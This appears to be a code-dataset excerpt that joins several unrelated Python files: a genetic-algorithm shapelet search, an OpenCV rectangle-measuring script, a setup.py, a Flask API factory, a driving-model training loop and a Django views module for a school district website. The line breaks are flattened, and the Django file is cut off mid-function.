copy(x.slen[i]) x.slen[i] += int(sigma * (self.smax + 1 - self.smin) * levy.rvs()) x.slen[i] = (x.slen[i] - self.smin) % (self.smax + 1 - self.smin) + self.smin x.start[i] = (x.start[i] + int(sigma * len(self.ts) * levy.rvs())) % (len(self.ts) - x.slen[i]) if not self.validate(x): x.start[i], x.slen[i] = copy(tmp_start), copy(tmp_slen) return 0 def crossover(self, x, y): for i in range(min(len(x.start), len(y.start))): if(np.random.uniform() < self.probability): tmp_start_x, tmp_slen_x = copy(x.start[i]), copy(x.slen[i]) tmp_start_y, tmp_slen_y = copy(y.start[i]), copy(y.slen[i]) x.start[i], y.start[i] = y.start[i], x.start[i] x.slen[i], y.slen[i] = y.slen[i], x.slen[i] if not self.validate(x): x.start[i], x.slen[i] = copy(tmp_start_x), copy(tmp_slen_x) if not self.validate(y): y.start[i], y.slen[i] = copy(tmp_start_y), copy(tmp_slen_y) return 0 def write_fitness(self, x: 'fitness curve', filename): df = pd.DataFrame(x) df.to_csv(self.output_folder + '/' + filename + '.fitness.csv', index=False, header=False) def write_shapelets(self, x: individual, filename): out = {} out['start'] = [start for start in x.start] out['slen'] = [slen for slen in x.slen] out['cluster'] = [cluster for cluster in x.cluster] if x.cluster is not None else [-2] * len(x.start) df = pd.DataFrame(out, columns=['start', 'slen', 'cluster']) df.sort_values('cluster', inplace=True) # unordered indizes .reset_index(inplace=True, drop=True) df.to_csv(self.output_folder + '/' + filename + '.shapelets.csv', index=False) return 0 def make_filename(self, popsize, sigma, t_max, notes): filename = os.path.splitext(os.path.basename(self.ts_path))[0] # get name without path and extension motifs = str(self.nsegments) + 'x' + str(self.min_support) + 'motifs' window_length = str(self.smin) + '-' + str(self.smax) + 'window' hyperparameter = str(popsize) + '_' + str(sigma) + '_' + str(t_max / 60) + '_' + str(notes) return 'genshapelet_' + filename + '_' + motifs + '_' + window_length + '_' + hyperparameter def make_individual(self): x = individual() for i in range(self.nsegments): x.slen.append(np.random.randint(self.smin, self.smax + 1)) x.start.append(np.random.randint(0, len(self.ts) - x.slen[i])) valid = False attempts = 5 # this is random, right; but the whole should stay random so .. ¯\_(ツ)_/¯ while(not valid and attempts > 0): valid = True for j in range(i): if((x.start[i] + x.slen[i] <= x.start[j]) or (x.start[j] + x.slen[j] <= x.start[i])): continue else: valid = False attempts -= 1 x.start[i] = np.random.randint(0, len(self.ts) - x.slen[i]) break if (attempts == 0): # print('The individual isn\'t complete. Check nsegments and smax parameter.') x.slen.pop() x.start.pop() break return x
nilq/baby-python
python
import cv2 import math import time import numpy as np mmRatio = 0.1479406021 scale = 2 frameWidth = 2304 frameHeight = 1536 frameCroopY = [650,950] windowsName = 'Window Name' def playvideo(): vid = cv2.VideoCapture(0) vid.set(cv2.CAP_PROP_FRAME_WIDTH, frameWidth) vid.set(cv2.CAP_PROP_FRAME_HEIGHT, frameHeight) while(True): ret, frame = vid.read() if not ret: vid.release() print('release') break frame = processFrame(frame) cv2.namedWindow(windowsName) cv2.startWindowThread() cv2.imshow(windowsName, frame) k = cv2.waitKey(1) if k == 27: break cv2.destroyAllWindows() def processFrame(frame): frame = frame[frameCroopY[0]:frameCroopY[1], 0:frameWidth] liveFrame = cv2.cvtColor(frame, cv2.COLOR_RGB2GRAY) # liveFrame = cv2.medianBlur(liveFrame, 1) # frame, kernel, x, y # liveFrame = cv2.GaussianBlur(liveFrame, (9, 9), 0) # frame, sigmaColor, sigmaSpace, borderType liveFrame = cv2.bilateralFilter(liveFrame, 10, 50, cv2.BORDER_WRAP) # _, liveFrame = cv2.threshold(liveFrame, 220, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU) liveFrame = cv2.Canny(liveFrame, 75, 150, 9) # cv2.goodFeaturesToTrack(img,maxCorners,qualityLevel, minDistance, corners, mask, blockSize, useHarrisDetector) corners = cv2.goodFeaturesToTrack(liveFrame, 2000, 0.01, 10) if corners is not None: corners = np.int0(corners) for i in corners: x, y = i.ravel() cv2.rectangle(liveFrame, (x - 1, y - 1), (x + 1, y + 1), (255, 255, 255), -100) # cv2.circle(liveFrame, (x, y), 3, 255, -1) _, cnts, _ = cv2.findContours( liveFrame.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) for c in cnts: # detect aproximinated contour peri = cv2.arcLength(c, True) approx = cv2.approxPolyDP(c, 0.04 * peri, True) # cv2.drawContours(frame, [approx], 0, (255, 0, 0), 1) x, y, w, h = cv2.boundingRect(c) # draw a green rectangle to visualize the bounding rect cv2.rectangle(frame, (x, y), (x + w, y + h), (255, 0, 0), 2) if len(approx) == 4: # calculate area area = cv2.contourArea(approx) cv2.drawContours(frame, [approx], 0, (0, 0, 255), 1) if (area >= 1000): cv2.drawContours(frame, [approx], 0, (255, 0, 0), 2) difference = abs(round(cv2.norm(approx[0], approx[2]) - cv2.norm(approx[1], approx[3]))) if (difference < 30): # use [c] insted [approx] for precise detection line # c = c.astype("float") # c *= ratio # c = c.astype("int") # cv2.drawContours(image, [c], 0, (0, 255, 0), 3) # (x, y, w, h) = cv2.boundingRect(approx) # ar = w / float(h) # draw detected object cv2.drawContours(frame, [approx], 0, (0, 255, 0), 3) # draw detected data M = cv2.moments(c) if (M["m00"] != 0): cX = int((M["m10"] / M["m00"])) cY = int((M["m01"] / M["m00"])) # a square will have an aspect ratio that is approximately # equal to one, otherwise, the shape is a rectangle # shape = "square" if ar >= 0.95 and ar <= 1.05 else "rectangle" (x, y, w, h) = cv2.boundingRect(approx) ar = w / float(h) # calculate width and height width = w * mmRatio height = h * mmRatio messurment = '%0.2fmm * %0.2fmm | %s' % (width, height, difference) # draw text cv2.putText(frame, messurment, (approx[0][0][0], approx[0][0][1]), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2) liveFrame = cv2.cvtColor(liveFrame, cv2.COLOR_GRAY2BGR) combined = np.vstack((liveFrame, frame)) height, width = combined.shape[:2] return cv2.resize(combined, (int(width/scale), int(height/scale))) playvideo()
nilq/baby-python
python
import os from setuptools import setup, find_packages import lendingblock def read(name): filename = os.path.join(os.path.dirname(__file__), name) with open(filename) as fp: return fp.read() meta = dict( version=lendingblock.__version__, description=lendingblock.__doc__, name='lb-py', author='Luca Sbardella', author_email="luca@lendingblock.com", maintainer_email="luca@lendingblock.com", url="https://github.com/lendingblock/lb-py", license="BSD", long_description=read('readme.md'), packages=find_packages(exclude=['tests', 'tests.*']), include_package_data=True, zip_safe=False, install_requires=['aiohttp'], classifiers=[ 'Development Status :: 3 - Alpha', 'Intended Audience :: Developers', 'License :: OSI Approved :: BSD License', 'Operating System :: OS Independent', 'Programming Language :: JavaScript', 'Programming Language :: Python', 'Programming Language :: Python :: 3', 'Programming Language :: Python :: 3.6', 'Topic :: Utilities' ] ) if __name__ == '__main__': setup(**meta)
nilq/baby-python
python
# pylint: disable=import-error from importlib import import_module from flask_restplus import Api # pylint: disable=no-name-in-module from utils.configmanager import ConfigManager from app import resources def make_api(api_config): api = Api( prefix=api_config["prefix"], title=api_config["title"], version=api_config["version"], catch_all_404s=True, ) for module_name in api_config["resources"]: module = import_module("." + module_name, "app.resources") namespace = getattr(module, "api") api.add_namespace(namespace) return api
nilq/baby-python
python
import os import sys import random import time import traceback import torch import torch.optim as optim from configs import g_conf, set_type_of_process, merge_with_yaml from network import CoILModel, Loss, adjust_learning_rate_auto from input import CoILDataset, Augmenter, select_balancing_strategy from logger import coil_logger from coilutils.checkpoint_schedule import is_ready_to_save, get_latest_saved_checkpoint, \ check_loss_validation_stopped # The main function maybe we could call it with a default name def execute(gpu, exp_batch, exp_alias, suppress_output=True, number_of_workers=12): """ The main training function. This functions loads the latest checkpoint for a given, exp_batch (folder) and exp_alias (experiment configuration). With this checkpoint it starts from the beginning or continue some training. Args: gpu: The GPU number exp_batch: the folder with the experiments exp_alias: the alias, experiment name suppress_output: if the output are going to be saved on a file number_of_workers: the number of threads used for data loading Returns: None """ try: # We set the visible cuda devices to select the GPU os.environ["CUDA_VISIBLE_DEVICES"] = gpu g_conf.VARIABLE_WEIGHT = {} # At this point the log file with the correct naming is created. # You merge the yaml file with the global configuration structure. merge_with_yaml(os.path.join('configs', exp_batch, exp_alias + '.yaml')) set_type_of_process('train') # Set the process into loading status. coil_logger.add_message('Loading', {'GPU': gpu}) # Put the output to a separate file if it is the case if suppress_output: if not os.path.exists('_output_logs'): os.mkdir('_output_logs') sys.stdout = open(os.path.join('_output_logs', exp_alias + '_' + g_conf.PROCESS_NAME + '_' + str(os.getpid()) + ".out"), "a", buffering=1) sys.stderr = open(os.path.join('_output_logs', exp_alias + '_err_'+g_conf.PROCESS_NAME + '_' + str(os.getpid()) + ".out"), "a", buffering=1) # Preload option if g_conf.PRELOAD_MODEL_ALIAS is not None: checkpoint = torch.load(os.path.join('_logs', g_conf.PRELOAD_MODEL_BATCH, g_conf.PRELOAD_MODEL_ALIAS, 'checkpoints', str(g_conf.PRELOAD_MODEL_CHECKPOINT)+'.pth')) # Get the latest checkpoint to be loaded # returns none if there are no checkpoints saved for this model checkpoint_file = get_latest_saved_checkpoint() if checkpoint_file is not None: checkpoint = torch.load(os.path.join('_logs', exp_batch, exp_alias, 'checkpoints', str(get_latest_saved_checkpoint()))) iteration = checkpoint['iteration'] best_loss = checkpoint['best_loss'] best_loss_iter = checkpoint['best_loss_iter'] else: iteration = 0 best_loss = 10000.0 best_loss_iter = 0 # Define the dataset. This structure is has the __get_item__ redefined in a way # that you can access the positions from the root directory as a in a vector. full_dataset = os.path.join(os.environ["COIL_DATASET_PATH"], g_conf.TRAIN_DATASET_NAME) # By instantiating the augmenter we get a callable that augment images and transform them # into tensors. augmenter = Augmenter(g_conf.AUGMENTATION) # Instantiate the class used to read a dataset. The coil dataset generator # can be found dataset = CoILDataset(full_dataset, transform=augmenter, preload_name=str(g_conf.NUMBER_OF_HOURS) + 'hours_' + g_conf.TRAIN_DATASET_NAME) print ("Loaded dataset") data_loader = select_balancing_strategy(dataset, iteration, number_of_workers) model = CoILModel(g_conf.MODEL_TYPE, g_conf.MODEL_CONFIGURATION) model.cuda() optimizer = optim.Adam(model.parameters(), lr=g_conf.LEARNING_RATE) if checkpoint_file is not None or g_conf.PRELOAD_MODEL_ALIAS is not None: model.load_state_dict(checkpoint['state_dict']) optimizer.load_state_dict(checkpoint['optimizer']) accumulated_time = checkpoint['total_time'] loss_window = coil_logger.recover_loss_window('train', iteration) else: # We accumulate iteration time and keep the average speed accumulated_time = 0 loss_window = [] print ("Before the loss") criterion = Loss(g_conf.LOSS_FUNCTION) # Loss time series window for data in data_loader: # Basically in this mode of execution, we validate every X Steps, if it goes up 3 times, # add a stop on the _logs folder that is going to be read by this process if g_conf.FINISH_ON_VALIDATION_STALE is not None and \ check_loss_validation_stopped(iteration, g_conf.FINISH_ON_VALIDATION_STALE): break """ #################################### Main optimization loop #################################### """ iteration += 1 if iteration % 1000 == 0: adjust_learning_rate_auto(optimizer, loss_window) # get the control commands from float_data, size = [120,1] capture_time = time.time() controls = data['directions'] # The output(branches) is a list of 5 branches results, each branch is with size [120,3] model.zero_grad() branches = model(torch.squeeze(data['rgb'].cuda()), dataset.extract_inputs(data).cuda()) loss_function_params = { 'branches': branches, 'targets': dataset.extract_targets(data).cuda(), 'controls': controls.cuda(), 'inputs': dataset.extract_inputs(data).cuda(), 'branch_weights': g_conf.BRANCH_LOSS_WEIGHT, 'variable_weights': g_conf.VARIABLE_WEIGHT } loss, _ = criterion(loss_function_params) loss.backward() optimizer.step() """ #################################### Saving the model if necessary #################################### """ if is_ready_to_save(iteration): state = { 'iteration': iteration, 'state_dict': model.state_dict(), 'best_loss': best_loss, 'total_time': accumulated_time, 'optimizer': optimizer.state_dict(), 'best_loss_iter': best_loss_iter } torch.save(state, os.path.join('_logs', exp_batch, exp_alias , 'checkpoints', str(iteration) + '.pth')) """ ################################################ Adding tensorboard logs. Making calculations for logging purposes. These logs are monitored by the printer module. ################################################# """ coil_logger.add_scalar('Loss', loss.data, iteration) coil_logger.add_image('Image', torch.squeeze(data['rgb']), iteration) if loss.data < best_loss: best_loss = loss.data.tolist() best_loss_iter = iteration # Log a random position position = random.randint(0, len(data) - 1) output = model.extract_branch(torch.stack(branches[0:4]), controls) error = torch.abs(output - dataset.extract_targets(data).cuda()) accumulated_time += time.time() - capture_time coil_logger.add_message('Iterating', {'Iteration': iteration, 'Loss': loss.data.tolist(), 'Images/s': (iteration * g_conf.BATCH_SIZE) / accumulated_time, 'BestLoss': best_loss, 'BestLossIteration': best_loss_iter, 'Output': output[position].data.tolist(), 'GroundTruth': dataset.extract_targets(data)[ position].data.tolist(), 'Error': error[position].data.tolist(), 'Inputs': dataset.extract_inputs(data)[ position].data.tolist()}, iteration) loss_window.append(loss.data.tolist()) coil_logger.write_on_error_csv('train', loss.data) print("Iteration: %d Loss: %f" % (iteration, loss.data)) coil_logger.add_message('Finished', {}) except KeyboardInterrupt: coil_logger.add_message('Error', {'Message': 'Killed By User'}) except RuntimeError as e: coil_logger.add_message('Error', {'Message': str(e)}) except: traceback.print_exc() coil_logger.add_message('Error', {'Message': 'Something Happened'})
nilq/baby-python
python
import json import urllib.request from urllib.error import URLError from django.shortcuts import render, get_object_or_404, redirect from django.core.cache import cache from django.http import HttpResponse, Http404 from django.template import Context, Template, RequestContext from django.db.models import Q, Prefetch, Count, OuterRef from django.utils import timezone from django.contrib import messages from django.apps import apps from django.http import HttpResponse from collections import OrderedDict import apps.common.functions as commonfunctions from apps.objects.models import Node, User from .models import Page, School, Department, Board, BoardSubPage, News, NewsYear, SubPage, BoardMeetingYear, DistrictCalendarYear,SuperintendentMessage,SuperintendentMessageYear, Announcement from apps.taxonomy.models import Location, City, State, Zipcode, Language, BoardPrecinct, BoardPolicySection, SchoolType, SchoolOption, SchoolAdministratorType, SubjectGradeLevel from apps.images.models import Thumbnail, NewsThumbnail, ContentBanner, ProfilePicture, DistrictLogo from apps.directoryentries.models import ( Staff, SchoolAdministrator, Administrator, BoardMember, StudentBoardMember, BoardPolicyAdmin, SchoolAdministration, SchoolStaff, SchoolFaculty, SchoolCommunityCouncilMember, ) from apps.links.models import ResourceLink, ActionButton, ClassWebsite from apps.documents.models import ( Document, BoardPolicy, Policy, AdministrativeProcedure, SupportingDocument, DisclosureDocument, SchoolCommunityCouncilMeetingAgenda, SchoolCommunityCouncilMeetingMinutes, ) from apps.files.models import File, AudioFile, VideoFile from apps.events.models import BoardMeeting, DistrictCalendarEvent, SchoolCommunityCouncilMeeting from apps.users.models import Employee from apps.contactmessages.forms import ContactMessageForm def updates_school_reg_dates(): reg_locations = { 10: 'Online', 20: 'Online/On-Site', 30: 'On-Site', } reg_audience = { 105: '1 - 5th Grade', 6: '6th Grade', 7: '7th Grade', 8: '8th Grade', 9: '9th Grade', 199: 'All Students', 99: 'All Unregistered Students', 0: 'Kindergarten', 13: 'New Students', 21: 'Returning Students', } try: response = urllib.request.urlopen('https://apex.slcschools.org/apex/slcsd-apps/regcalendars/') except URLError: return jsonalldates = response.read() alldates = json.loads(jsonalldates.decode("utf-8")) groupeddates = {} for date in alldates['items']: if date['location'] in reg_locations: date['location'] = reg_locations[date['location']] if date['audience'] in reg_audience: date['audience'] = reg_audience[date['audience']] if date['school'] not in groupeddates: groupeddates[date['school']] = [] groupeddates[date['school']].append(date) return groupeddates def set_template(request, node): if request.site.domain == 'www.slcschools.org': if request.path == '/' or request.path == '/home/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'home.html', ) if request.path == '/employees/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if request.path == '/schools/school-handbooks/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if request.path == '/schools/district-demographics/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if request.path == '/search/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if request.path == '/departments/department-structure/': return 'cmstemplates/www_slcschools_org/pagelayouts/departmentstructure.html' if request.path == '/departments/superintendents-office/downloads/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if request.path == '/calendars/guidelines-for-developing-calendar-options/': return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page-wide.html', ) if node.content_type == 'board' or node.content_type == 'boardsubpage': return 'cmstemplates/www_slcschools_org/pagelayouts/boarddetail.html' if node.content_type == 'newsyear': return 'cmstemplates/www_slcschools_org/pagelayouts/newsyeararchive.html' if node.content_type == 'news': return 'cmstemplates/www_slcschools_org/pagelayouts/articledetail.html' if request.path == '/schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/main-school-directory.html' if request.path == '/schools/elementary-schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if request.path == '/schools/k-8-schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if request.path == '/schools/middle-schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if request.path == '/schools/high-schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if request.path == '/schools/charter-schools/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if request.path == '/schools/community-learning-centers/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-directory.html' if node.content_type == 'school': return 'cmstemplates/www_slcschools_org/pagelayouts/schooldetail.html' if request.path == '/departments/': return 'cmstemplates/www_slcschools_org/pagelayouts/department-directory.html' if node.content_type == 'superintendentmessageyear': return 'cmstemplates/www_slcschools_org/pagelayouts/supermessageyeararchive.html' if node.content_type == 'department': return 'cmstemplates/www_slcschools_org/pagelayouts/departmentdetail.html' if node.content_type == 'superintendentmessage': return 'cmstemplates/www_slcschools_org/pagelayouts/supermessagedetail.html' if request.path == '/directory/': return 'cmstemplates/www_slcschools_org/pagelayouts/directory.html' if request.path.startswith('/directory/last-name-'): return 'cmstemplates/www_slcschools_org/pagelayouts/directory-letter.html' if node.content_type == 'districtcalendaryear': return 'cmstemplates/www_slcschools_org/pagelayouts/districtcalendaryears.html' if node.content_type == 'boardmeetingyear': return 'cmstemplates/www_slcschools_org/pagelayouts/boardmeetingyears.html' if request.path == '/contact-us/': return 'cmstemplates/www_slcschools_org/pagelayouts/contact-us.html' if request.path == '/contact-us/inline/': return 'cmstemplates/www_slcschools_org/blocks/contact-us-inline.html' if request.path == '/schools/school-registration-dates/': return 'cmstemplates/www_slcschools_org/pagelayouts/school-registration-dates.html' if node.node_type == 'documents': if node.content_type == 'document': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'policy': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'administrativeprocedure': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'supportingdocument': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'boardmeetingagenda': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'boardmeetingminutes': return 'cmstemplates/www_slcschools_org/pagelayouts/document.html' if node.content_type == 'boardmeetingaudio': return 'cmstemplates/www_slcschools_org/pagelayouts/audio.html' if node.content_type == 'boardmeetingvideo': return 'cmstemplates/www_slcschools_org/pagelayouts/video.html' return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, 'page.html', ) else: return 'cmstemplates/{0}/pagelayouts/{1}'.format( request.site.dashboard_general_site.template.namespace, node.pagelayout.namespace, ) def redirect_request(request): currentyear = commonfunctions.currentyear() if request.path == '/board-of-education/board-meetings/': try: year = BoardMeetingYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) except BoardMeetingYear.DoesNotExist: meeting, created = BoardMeeting.objects.get_or_create(startdate=timezone.now(), site=request.site) if created: meeting.save() meeting.delete() meeting.delete() year = BoardMeetingYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) return redirect(year.url) if request.path == '/calendars/' and request.site.domain == 'www.slcschools.org': try: year = DistrictCalendarYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) except DistrictCalendarYear.DoesNotExist: event, created = DistrictCalendarEvent.objects.get_or_create(startdate=timezone.now(), site=request.site) if created: event.save() event.delete() event.delete() year = DistrictCalendarYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) return redirect(year.url) if request.path == '/news/': try: year = NewsYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) except NewsYear.DoesNotExist: news, created = News.objects.get_or_create(title='tempnews', site=request.site) if created: news.save() news.delete() news.delete() year = NewsYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) return redirect(year.url) if request.path == '/departments/superintendents-office/superintendents-message/': try: year = SuperintendentMessageYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) except SuperintendentMessageYear.DoesNotExist: message, created = SuperintendentMessage.objects.get_or_create(author_date=timezone.now(), site=request.site) if created: message.save() message.delete() message.delete() year = SuperintendentMessageYear.objects.get(title=currentyear['currentyear']['long'], site=request.site) return redirect(year.url) return None def prefetch_building_location_detail(qs): prefetchqs = ( Location .objects .filter(deleted=0) .filter(published=1) .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) return qs.prefetch_related( Prefetch( 'building_location', queryset=prefetchqs, ) ) def prefetch_boardmembers_detail(qs): prefetchqs = ( BoardMember .objects .filter(deleted=0) .filter(published=1) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('precinct__title') .only( 'employee', 'is_president', 'is_vicepresident', 'precinct', 'phone', 'street_address', 'city', 'state', 'zipcode', 'term_ends', 'related_node', ) .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=1) .filter(is_staff=1) .only( 'last_name', 'first_name', 'email', ) .prefetch_related( Prefetch( 'images_profilepicture_node', ProfilePicture.objects .filter(deleted=0) .filter(published=1) .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ), Prefetch( 'precinct', queryset=( BoardPrecinct .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) .prefetch_related('files_precinctmap_node') .order_by('title') ) ), Prefetch( 'city', queryset=( City .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'state', queryset=( State .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ), Prefetch( 'zipcode', queryset=( Zipcode .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_boardmember_node', queryset=prefetchqs, ) ) def prefetch_studentboardmember_detail(qs): prefetchqs = ( StudentBoardMember .objects .filter(deleted=0) .filter(published=1) .order_by('title') .only( 'first_name', 'last_name', 'phone', 'building_location', 'related_node', ) .prefetch_related( Prefetch( 'building_location', queryset=( Location .objects .filter(deleted=0) .filter(published=1) .only( 'street_address', 'location_city', 'location_state', 'location_zipcode', 'google_place', ) .prefetch_related( Prefetch( 'location_city', queryset=( City .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_state', queryset=( State .objects .filter(deleted=0) .filter(published=1) .only('title') ) ), Prefetch( 'location_zipcode', queryset=( Zipcode .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ), Prefetch( 'images_profilepicture_node', queryset=( ProfilePicture .objects .filter(deleted=0) .filter(published=1) .only( 'image_file', 'alttext', 'related_node_id', ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_studentboardmember_node', queryset=prefetchqs, ) ) def prefetch_schooladministrators_detail(qs): prefetchqs = (SchoolAdministrator .objects .filter(deleted=False) .filter(published=True) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('inline_order') .only( 'pk', 'employee', 'schooladministratortype', 'inline_order', 'related_node', ) .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) .prefetch_related( Prefetch( 'images_profilepicture_node', queryset=( ProfilePicture .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', 'image_file', 'alttext', 'related_node', ) ), ) ) ), ), ) .prefetch_related( Prefetch( 'schooladministratortype', queryset=( SchoolAdministratorType .objects .filter(deleted=False) .filter(published=True) .only( 'pk', 'title', ) ), ), ) ) return qs.prefetch_related( Prefetch( 'directoryentries_schooladministrator_node', queryset=prefetchqs, ) ) def prefetch_administrators_detail(qs): prefetchqs = ( Administrator .objects .filter(deleted=False) .filter(published=True) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('inline_order') .only( 'pk', 'employee', 'job_title', 'inline_order', 'related_node', ) .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) .prefetch_related( Prefetch( 'images_profilepicture_node', queryset=( ProfilePicture .objects .filter(deleted=0) .filter(published=1) .only( 'pk', 'title', 'image_file', 'alttext', 'related_node', ) ) ) ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_administrator_node', queryset=prefetchqs, ) ) def prefetch_staff_detail(qs): prefetchqs = ( Staff .objects .filter(deleted=False) .filter(published=True) .filter(employee__is_active=True) .filter(employee__is_staff=True) .order_by('inline_order') .only( 'pk', 'employee', 'job_title', 'inline_order', 'related_node', ) .prefetch_related( Prefetch( 'employee', queryset=( Employee .objects .filter(is_active=True) .filter(is_staff=True) .only( 'pk', 'last_name', 'first_name', 'email', 'job_title', ) ) ) ) ) return qs.prefetch_related( Prefetch( 'directoryentries_staff_node', queryset=prefetchqs, ) ) def prefetch_documents_detail(qs): prefetchqs = ( Document .objects .filter(deleted=0) .filter(published=1) .order_by('inline_order') .only( 'pk', 'title', 'inline_order', 'related_node' ) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) return qs.prefetch_related( Prefetch( 'documents_document_node', queryset=prefetchqs, ) ) def prefetch_disclosuredocuments_detail(qs): prefetchqs = ( DisclosureDocument .objects .filter(deleted=0) .filter(published=1) .annotate( file_count=Count( 'files_file_node', filter=Q( files_file_node__published=1, files_file_node__deleted=0, ) ) ) .filter(file_count__gt=0) .order_by('inline_order') .only( 'pk', 'title', 'inline_order', 'related_node' ) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) return qs.prefetch_related( Prefetch( 'documents_disclosuredocument_node', queryset=prefetchqs, ) ) def prefetch_schoolcommunitycouncilmembers_detail(qs): prefetchqs = ( SchoolCommunityCouncilMember .objects .filter(deleted=0) .filter(published=1) .order_by('inline_order') ) qs = qs.prefetch_related( Prefetch( 'directoryentries_schoolcommunitycouncilmember_node', queryset=prefetchqs, ) ) return qs def prefetch_schoolcommunitycouncilmeetings_detail(qs): prefetchqs = ( SchoolCommunityCouncilMeeting .objects .filter(deleted=0) .filter(published=1) .order_by('startdate') ) prefetchqs = prefetch_schoolcommunitycouncilmeetingagenda_detail(prefetchqs) prefetchqs = prefetch_schoolcommunitycouncilmeetingminutes_detail(prefetchqs) qs = qs.prefetch_related( Prefetch( 'events_schoolcommunitycouncilmeeting_node', queryset=prefetchqs, ) ) return qs def prefetch_schoolcommunitycouncilmeetingagenda_detail(qs): prefetchqs = ( SchoolCommunityCouncilMeetingAgenda .objects .filter(deleted=0) .filter(published=1) .annotate( file_count=Count( 'files_file_node', filter=Q( files_file_node__published=1, files_file_node__deleted=0, ) ) ) .filter(file_count__gt=0) .order_by('inline_order') .only( 'pk', 'title', 'inline_order', 'related_node' ) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) qs = qs.prefetch_related( Prefetch( 'documents_schoolcommunitycouncilmeetingagenda_node', queryset=prefetchqs, ) ) return qs def prefetch_schoolcommunitycouncilmeetingminutes_detail(qs): prefetchqs = ( SchoolCommunityCouncilMeetingMinutes .objects .filter(deleted=0) .filter(published=1) .annotate( file_count=Count( 'files_file_node', filter=Q( files_file_node__published=1, files_file_node__deleted=0, ) ) ) .filter(file_count__gt=0) .order_by('inline_order') .only( 'pk', 'title', 'inline_order', 'related_node' ) .prefetch_related( Prefetch( 'files_file_node', queryset=( File .objects .filter(deleted=0) .filter(published=1) .order_by( 'file_language__lft', 'file_language__title', ) .only( 'title', 'file_file', 'file_language', 'related_node', ) .prefetch_related( Prefetch( 'file_language', queryset=( Language .objects .filter(deleted=0) .filter(published=1) .only('title') ) ) ) ) ) ) ) qs = qs.prefetch_related( Prefetch( 